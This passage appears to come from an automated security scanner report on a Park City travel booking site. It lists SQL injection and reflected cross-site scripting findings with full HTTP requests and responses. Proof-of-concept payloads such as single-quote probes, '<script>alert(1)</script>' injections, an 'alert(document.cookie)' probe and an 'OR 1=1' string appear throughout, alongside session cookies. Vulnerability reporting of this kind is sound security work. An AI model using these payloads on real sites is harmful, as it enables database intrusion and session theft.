Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:45:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 276

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.18. http://parkcitytrips.com/redirect_booking.php [clone_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The clone_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the clone_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /redirect_booking.php?clone_id=41'&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:45:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 276

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.19. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436&sDate=10/26/2010&eDate=10/29/2010&cloneID=41' HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:57:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 276
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.20. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436'&sDate=10/26/2010&eDate=10/29/2010&cloneID=41 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:49:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 267
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT geolocationString FROM events WHERE id = 1436'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.21. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php?sitename=parkcitytrips_com&eventID=1436&sDate=10/26/2010&eDate=10/29/2010&cloneI/1'D=41 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 23:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 480
Content-Type: text/html; charset=UTF-8
Connection: close

<br />
<b>Notice</b>: Undefined index: cloneID in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/php_ajax/price_calendar_wrapper.php</b> on line <b>42</b><br />
Error: A problem was encounte
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and clone_field_id = 48' at line 1

1.22. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /v002/dbase/php_ajax/specials.php?cloneID=41'&eventID=1421&group_id=1293&sDate=2011-02-14&eDate=2011-02-15&deals=1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:46:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 276
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.23. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /v002/dbase/php_ajax/specials.php?cloneID=41&eventID=1418'&group_id=1293&sDate=2011-02-14&eDate=2011-02-15 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:48:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 267
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT geolocationString FROM events WHERE id = 1418'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

2. Cross-site scripting (reflected)  previous  next
There are 49 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://parkcitytrips.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3df04"-alert(1)-"a304c2c6b75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3df04"-alert(1)-"a304c2c6b75=1 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:45:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 2836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?3df04"-alert(1)-"a304c2c6b75=1clone_id=41&group_id=982";
   
   }
}

</script>
...[SNIP]...

2.2. http://parkcitytrips.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0278"><script>alert(1)</script>1fd1d9b0778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?e0278"><script>alert(1)</script>1fd1d9b0778=1 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:45:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 2866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="booking_results.php?e0278"><script>alert(1)</script>1fd1d9b0778=1clone_id=41&group_id=982">
...[SNIP]...

2.3. http://parkcitytrips.com/booking_results.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the cloneID request parameter is copied into the HTML document as plain text between tags. The payload 94bbd<script>alert(1)</script>9e545f2d586 was submitted in the cloneID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=4194bbd<script>alert(1)</script>9e545f2d586&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:10:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tck7v6vsa739fefqbqjur2s5v2; path=/
Connection: close
Content-Length: 334

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 4194bbd<script>alert(1)</script>9e545f2d586</i> You have an error in your SQL s
...[SNIP]...

2.4. http://parkcitytrips.com/booking_results.php [clone_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the clone_id request parameter is copied into the HTML document as plain text between tags. The payload 34c23<script>alert(1)</script>c1aa8bb4b76 was submitted in the clone_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?clone_id=4134c23<script>alert(1)</script>c1aa8bb4b76&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:49:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 334
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 4134c23<script>alert(1)</script>c1aa8bb4b76</i> You have an error in your SQL s
...[SNIP]...

2.5. http://parkcitytrips.com/booking_results.php [group_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the group_id request parameter is copied into the HTML document as plain text between tags. The payload ec6d6<script>alert(1)</script>3fb22b2b442 was submitted in the group_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982ec6d6<script>alert(1)</script>3fb22b2b442 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:11:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6k1jp47ke7hrulovn7cejjsvl4; path=/
Connection: close
Content-Length: 356


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = 982ec6d6<script>alert(1)</script>3fb22b2b442</i> You have
...[SNIP]...

2.6. http://parkcitytrips.com/booking_results.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ac08<script>alert(1)</script>9eed3267f28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=-982%27OR%201=1))%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3/1ac08<script>alert(1)</script>9eed3267f28E0-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: parkcitytrips.com
Cookie: PHPSESSID=rtbf9mia87rdbeie5r94s1lge3; SERVERID=i-07d1a66e
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:52:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 485


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = -982'OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)%3/1ac08<script>alert(1)</script>9eed3267f28E0--</i>
...[SNIP]...

2.7. http://parkcitytrips.com/booking_results.php [rooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the rooms request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18875</script><script>alert(1)</script>81a0536176f was submitted in the rooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /booking_results.php?cloneID=41&rooms=118875</script><script>alert(1)</script>81a0536176f&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:11:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mlve5bjhef3k4tcl39visvag5; path=/
Connection: close
Content-Length: 360691


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
<a href=\'http://parkcitytrips.com/redirect.php?group_id=982&cloneID=41&nights=3&rooms=118875</script><script>alert(1)</script>81a0536176f&adults=1&kids=0&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1455&linkTypeID=5&clickSourceID=9\' target=\'_blank\' class=\'book-direct\' _gaq.push([\'jrs_analytics._trackEvent\',\'Map Page\',\
...[SNIP]...

2.8. http://parkcitytrips.com/booking_results.php [rooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The value of the rooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98edd"><script>alert(1)</script>87ab84a1024 was submitted in the rooms parameter. This input was echoed unmodified in the application's response.

